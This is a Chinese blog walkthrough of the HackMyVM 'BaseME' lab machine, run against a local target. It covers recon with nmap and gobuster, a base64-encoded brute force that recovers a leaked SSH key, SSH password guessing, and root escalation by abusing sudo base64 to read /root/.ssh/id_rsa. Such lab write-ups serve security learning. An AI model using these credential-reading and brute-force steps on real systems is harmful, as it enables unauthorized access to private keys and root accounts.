freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hackmyvm系列7——BaseME
2022-05-06 21:20:59

前言:

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC -A 192.168.56.169

1651728966_627362468d4973b7fb952.png!small?1651728967997

只开放了80和22端口,访问页面,对页面的信息进行解码。

1651729059_627362a302e545d5f98e7.png!small?1651729059969

得到一个用户名:lucas,

大概意思是说,需要进行base64加密包括密码,因此对其目录文件进行base64加密爆破。

编写一个简单的脚本。

1651729223_6273634761616aecc95e2.png!small?1651729224296

利用其进行目录爆破:

gobuster dir -u http://192.168.56.169/ -w dic.txt -w dic.txt

得到一个文件。

1651729589_627364b54bad4ed72db24.png!small?1651729590380

对其进行解码保存,

base64 -d aWRfcnNhCg=\= > a.txt

1651729731_627365435e16797a593b8.png!small?1651729732719

二、登录SSH

解码是个id_rsa文件,尝试利用首页的用户名进行连接。

1651729801_627365892a5573124843b.png!small?1651729802249

但是需要密码,尝试爆破,这里肯定需要base64编码,首页的提示。1651729864_627365c89964bf7c85f3c.png!small?1651729865535

iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme

对其编码后尝试。

1651730002_627366527a37c23575ded.png!small?1651730003467

成功登录SSH。

三、权限提升

sudo -l

发现base64运行任何用户无认证运行。

可以尝试将root的id_rsa加密后保存到当前目录,之后进行解密登录

sudo -u root base64 /root/.ssh/id_rsa > a.txt

进行解密

base64 -d a.txt > b.txt

成功登录root

chmod 600 b.txt 
ssh root@127.0.0.1 -i b.txt

本文作者:, 转载请注明来自FreeBuf.COM

# 靶场实战 # 靶场攻关
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑